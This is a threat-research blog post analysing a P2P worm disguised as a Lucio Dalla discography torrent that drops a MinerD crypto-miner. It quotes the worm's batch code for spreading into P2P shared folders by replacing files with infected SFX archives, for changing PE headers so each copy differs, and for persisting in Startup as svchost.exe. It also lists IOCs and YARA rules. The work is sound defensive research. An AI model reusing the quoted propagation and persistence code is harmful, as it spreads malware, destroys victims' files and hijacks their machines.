P2P Worm Spreads Crypto-Miners in the Wild

Introduction

In the past months we published a white paper exploring the risks that users can encounter when downloading materials from P2P sharing network, such as the Torrent one. We discussed how crooks easily lure their victims to download malware along with the desired content. Recently, our threat monitoring operations pointed us to an interesting file named “Lucio Dalla Discografia Completa”: this file pretends to be  a collection of the discography of a  famous italian singer, but it actually hides malicious intents. 

For this reason, Cybaze-Yoroi ZLAB dissected this malware threat revealing its hidden virulent nature. 

Technical Analysis 

As anticipated, the file downloaded from the BitTorrent network is an executable. A quick recon revealed it actually is an SFX archive containing several other files. 

Hashf9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a
ThreatMiner-Dropper
Brief DescriptionCoin-miner dropper (SFX archive)
Ssdeep98304:BbEwGxyUOn/JaYYaeY+dM6YydmOQ1zYuuUBb53+munE0dMp1oHnXZetvRfuODYN

Table 1: Static Information about the miner dropper

The usage of archive like SFX allows the attacker to hide the content of the malicious PE and significantly reduce the detection rate. Opening the sample with a common archive manager like WinRAR or 7z, unveil its content. 

Figure 1: Content of the SFX file

The archive contains more than a dozen of files. In detail it embeds:

  • 16 temporary files used during execution;
  • a Visual Basic Script;
  • a batch script;
  • and a setup file

On the right of Figure 1 it is possible to see the SFX configuration file. After the auto-extraction, the first file run is “run.vbs”. Its content is minimal and quickly redirect the execution to a small batch file, “installer.bat” contained in the same folder. Then it runs installer.bat (the filename) with the parameter “0″ (WindowStyle hidden, to avoid hidden windows because it may trigger AntiViruses heuristics) and “true” (WaitOnReturn).

The content of “installer.bat” file is also minimal and points to a more complex text file “007.tmp”, later renamed as “007.bat”. That file weighs over 59 KB and contains more interesting functionalities.

Unlike the previous script, the “007” file performs many operations. The first one is to copy of all files contained in the extraction path directory into “#” subdirectory and to rename some of the just extracted files, suggesting some of the files are dependencies of a more complex chain.

@echo off & setlocal enabledelayedexpansion

set CURRDIR=%~dp0
md #
copy "%CURRDIR%/002.tmp" "%CURRDIR%/#/002.tmp"
copy "%CURRDIR%/003.tmp" "%CURRDIR%/#/003.tmp"
copy "%CURRDIR%/004.tmp" "%CURRDIR%/#/004.tmp"
copy "%CURRDIR%/005.tmp" "%CURRDIR%/#/005.tmp"
copy "%CURRDIR%/006.tmp" "%CURRDIR%/#/006.tmp"
copy "%CURRDIR%/007.tmp" "%CURRDIR%/#/007.tmp"
copy "%CURRDIR%/008.tmp" "%CURRDIR%/#/008.tmp"
copy "%CURRDIR%/010.tmp" "%CURRDIR%/#/010.tmp"
copy "%CURRDIR%/011.tmp" "%CURRDIR%/#/011.tmp"
copy "%CURRDIR%/013.tmp" "%CURRDIR%/#/013.tmp"
copy "%CURRDIR%/014.tmp" "%CURRDIR%/#/014.tmp"
copy "%CURRDIR%/016.tmp" "%CURRDIR%/#/016.tmp"
copy "%CURRDIR%/installer.bat" "%CURRDIR%/#/installer.bat"
copy "%CURRDIR%/run.vbs" "%CURRDIR%/#/run.vbs"
copy "%CURRDIR%/002.tmp" "%CURRDIR%/7z.exe"
copy "%CURRDIR%/003.tmp" "%CURRDIR%/7z.dll"
copy "%CURRDIR%/004.tmp" "%CURRDIR%/Default.SFX"
copy "%CURRDIR%/005.tmp" "%CURRDIR%/Rar.exe"
copy "%CURRDIR%/006.tmp" "%CURRDIR%/sfx.conf

Code Snippet 1: Copy of the files in a subfolder

After that, it generates three different files named “001.tmp”, “32.tmp” and “64.tmp”, later renamed with “.exe” suffix. They are created by mixing up the original files. In particular: “001.tmp” is created combining file “008.tmp”, “009.tmp” and “010.tmp”. The resulting executable have been split in those files, evading AV signatures. 

But this composed executable hides another interesting detail. Before merging the file slices, the script replaces part of the PE header: it overrides the “This program cannot be run in DOS mode” string with random chars, generating different files hashes at every infection. This polymorphic techniques implemented directly in bash stage is applied to all the other files chunked and embedded into the original SFX archive.

Figure 2: Generation of the custom DOS header

After that, the script tries to use the just created “Rar.exe” and “7z.exe” files to create new SFX file in other directories belonging to the P2P platforms. This trick is used to spread the attack across the file-sharing communities, to compromise much more victims and to keep the infection alive. An example of this routine is the following:

for /d /r "c:\" %%a in (preferences.ini) do (
if exist "%%a" (
for /f %%b in ('findstr /c:"IncomingDir=" "%%a"') do (
set "var=%%b"
for %%c in ("!var:~12!\*.*") do (
ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
del "%%~nc".exe
del "%%c"
move "%%~nc.zip" "!var:~12!\"   ))))

[...]

for /d /r "c:\" %%a in (*) do (
if /i "%%~nxa"=="my grokster" (
set "var=%%a" (
for %%c in ("!var!\*.*") do (
ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
del "%%~nc".exe
del "%%c"
move "%%~nc.zip" "!var!\"   ))))

Code Snippet 2: Example of propagation routine

All these actions are performed for each system drive letter, such as C:, D:, X: and so on. After that, the script looks for the Microsoft Windows OS version from “5.x” to “15.x” and finally executes several specific routines according to the target machine. These routines perform a few basic operations:

  1. Create a new directory in “%systemdrive\AppCache\x86%” and immediately hide it; 
  2. Copy the file “001.tmp” in the Startup Folder (for every OS language) renaming it as “svchost.exe” and the file 32/64.tmp in “AppCache\x86\”;
  3. Execute “001.exe” file. 
:win7
if defined PROGRAMFILES(X86) (goto x64) else (goto x86)

:x64
mkdir %systemdrive%\AppCache\x86
attrib +s +h %systemdrive%\AppCache\x86
attrib +s +h %systemdrive%\AppCache
copy /y "%CURRDIR%\001.tmp" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
copy /y "%CURRDIR%\001.tmp" "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
[...]
copy /y "%CURRDIR%\64.tmp" "%systemdrive%\AppCache\x86\svchost.exe"
attrib +h "%systemdrive%\AppCache\x86\svchost.exe"
"%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
"%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
[...]
goto end

Code Snippet 3: Choose of the files to copy whether the target architecture is x86 or x64

At this point, the malicious control passes to the 001.exe file located in the Startup folder.

Figure 3: UPX signature evidence

The 001 File

The 001.exe is actually packed with a known version of the UPX compressor. So, the extraction of the payload is quite straight forward.

Hashb6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea
ThreatMiner Launcher
Brief DescriptionCoin-miner Payload (001.exe) packed with UPX
Ssdeep3072:A3VD85gJFV8QncMujKCv0jqAi0hIazLEHYxWVfhn+zM45uUyvHBsV2svkgfODQ2C

Table 2: Generic info about the Miner Loader

Hash7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422
ThreatMiner Launcher Decompressed
Brief DescriptionCoin-miner Payload (001.exe) unpacked
Ssdeep12288:7EyxWjS8ZZVajy6YWgHQ+oHxlJz4UE0UsZ+GmYNuuv:oyxWjS8ZZVUYWgw1Hh

Table 3: Generic info about the Miner Loader unpacked

Analyzing the decompressed binary, we noticed the malware firstly tries to run the “svchost.exe” binary contained in “%systemdrive%\AppCache\x86”, which likely is the real payload.

Figure 4: Evicends of the mining routine

The Payload

Hash73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
ThreatMiner-Payload
Brief DescriptionCoin-miner Payload (32.exe) packed with UPX (minerd)
Ssdeep73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263

Table 4: Generic Information of the Coininer compiled in 32 bit (UPX packed)

Hasha3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d
ThreatMiner-Payload
Brief DescriptionCoin-miner Payload (64.exe) packed with UPX (minerd)
Ssdeep49152:sb5CY+muocuUwlCdMsQd1pSHn/5JKIezmMNkG7403EIlnDysnue759ByzPIYNUN

Table 5: Generic Information of the Coininer compiled in 32 bit (UPX unpacked)

The “svchost.exe” placed in the file “%systemdrive%\AppCache\x86” folder actually is one of the two files “32.exe” and “64.exe” previously created.  After unpacking routines, the results are the following.

Hash746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e
ThreatMiner-Payload
Brief DescriptionCoin-miner Payload (32.exe) unpacked (minerd)
Ssdeep196608:aN8/juE4Be73AeWNEwVGuhcf7eVhbjYV:tuwUbK

Table 6: Generic Information of the Coininer compiled in 64 bit (UPX packed)

Hash552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7
ThreatMiner-Payload
Brief DescriptionCoin-miner Payload (64.exe) unpacked(minerd)
Ssdeep393216:6ovgtbTTTpT1TITHThTtTwTaTtTVTFTZTlTNTbTwTuTzT1T0TtTlT1ToTlTzTVTz:6

Table 7: Generic Information of the Coininer compiled in 64 bit (UPX packed)

Obviously, these hashes changes at every infection due to the polymorphic technique implemented in the bash stage previously described. The unique purpose of “001.exe” is the execution of “32.exe” or “64.exe” contained in “%systemdrive%\AppCache\x86”, a stratum-based coinminer. Stratum is the de-facto standard protocol used by crypto-miners to connect to mining pools. 

Figure 5: Connection routine to the mining server

Exploring the sample we notice that it actually is “MinerD”, an open-source cryptomining software publicly available on GitHub

Figure 6: Comparison between the payloads (on the left) and the GitHub project (on the right)

Conclusion

This malware threat reminds us of the hidden risks of downloading material through p2p networks, along with the tricks adopted by the crooks to keep the campaign running in the wild. Indeed, this sample is able to survive across multiple p2p network by propagating to p2p shared folders configured into the victim machine, ensuring a good level of resilience from the attacker point of view.  Also, the attackers implemented polymorphic trick directly in batch language, replacing of part of the PE file header to create unique samples on each infection .

A naive or a distracted user can be lured to download infected media contents with the promise to ear his favorite musician, but this action can be compromise the machine of the victim and feed the cyber-criminals behind this campaign. This time, the consequences of such lack of awareness are quite contained, the final payload is actually a crypto-miner and the user may only experience delays or crashes, but what if the payload contains a bot a RAT, or even a ransomware? The consequences could be decisely more serious.

Indicators of Compromise

Hash

  • f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a
  • b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea
  • 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422
  • 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
  • a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d
  • 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e
  • 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7

Mining Pool  (Coin-Miner): 

  • tcp://xcnpool[.1gh[.com

Yara Rules

rule LucioDalla_CoinMiner_SFX_201907 {
meta:
   	 description = "Yara Rule for SFX file of Lucio Dalla CoinMiner"
   	 author = "ZLAB Yoroi - Cybaze"
   	 last_updated = "2019-07-12"
   	 tlp = "white"
   	 category = "informational"

   strings:
      $s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov"
      $s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov" 
      $s3 = "7-Zip - Copyright (c) 1999-2011 " ascii
      $s4 = "sfxelevation" ascii wide
      $h1 = { 30 ?? ?? 2E 74 6D 70 } 
      $setup = "setup" wide ascii 

condition:
      any of ($s*) and $setup and (#h1 > 8)
}

rule LucioDalla_001_UPX_201907 {
	meta:
		description = "Yara Rule for 001 UPX file file of Lucio Dalla CoinMiner"
		author = "ZLAB Yoroi - Cybaze"
		last_updated = "2019-07-12"
		tlp = "white"
		category = "informational"

   strings:
		$s1 = "UPX" 
		$h1 = { CB 40 5A 3E 2A E5 A2 C3 } 
		$h2 = { 38 D5 CD 57 3F E4 BF 45 }
		$h3 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }

condition:
		all of them
}

rule LucioDalla_001_Unpacked_201907 {
	meta:
		description = "Yara Rule for 001 unpacked file file of Lucio Dalla CoinMiner"
		author = "ZLAB Yoroi - Cybaze"
		last_updated = "2019-07-12"
		tlp = "white"
		category = "informational"

   strings:
		$s1 = "zPLR" 
		$s2 = "\\AppCache\\x86\\svchost.exe"
		$h1 = { 24 E8 5A CF FF FF 83 EC 04 } 
		$h2 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }

condition:
		all of them
}

rule LucioDalla_Miner_Workers_201907 {
	meta:
		description = "Yara Rule for all CoinMiner Workers"
		author = "ZLAB Yoroi - Cybaze"
		last_updated = "2019-07-12"
		tlp = "white"
		category = "informational"

   strings:
		$upx = "UPX"
		$hpa32 = { 42 DA 92 BF 2D BB F0 B0 } 
		$hpb32 = { 2F 4D 7B 8C 83 FB 03 FF C2 }
		$hp64a = { B0 29 74 3A 48 55 04 6C 30 }
		$hp64b = { 11 60 6C A4 E9 FA 71 BE 47 }
		
		$s1 = "blowfish.c"
		$s2 = "mpih-rshift-asm"
		$s3 = { D0 67 EC 67 B6 67 AF 67 F5 }

condition:
		($upx and 2 of ($hp*)) or (all of ($s*))
}

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB